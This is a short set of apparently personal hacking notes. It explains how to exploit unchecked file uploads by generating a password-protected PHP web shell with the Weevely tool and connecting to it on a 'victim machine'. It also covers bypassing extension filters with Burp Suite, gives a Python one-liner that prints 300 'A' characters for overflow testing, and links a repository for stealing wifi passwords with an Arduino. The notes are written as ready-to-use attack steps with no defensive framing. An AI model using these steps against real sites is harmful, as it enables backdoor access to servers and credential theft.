If a website is allowing you to upload files without checking its type then🤩 You can use Weevly software on Kali. [ This will spin up a shell on the victim machine]
# this will generate a payload that will spen a shell code in the server.
# the password is to secure the backdoor just to you
# try to pick a file extension that the server allowed
weevly generate [random password] [file name.php]
# Try to get where is the file is stored on the server
# connect to it by this command
weevly [URL to the file] [the password]
# It can do much more to a web application use help command to know more
weevly help
⚠️ NOTE: if the server has allowing only some extensions like [png, jpg ,etc] then you can use Burp suite to intercept the request and change it to whatever.
Python payload to print multiple A
# the hex of A is 41
`python -c "print '\x41'*300"`
Stealing Wifi Password using arduino
https://github.com/DarkMetalMouse/ardiuno-keystroke-reflection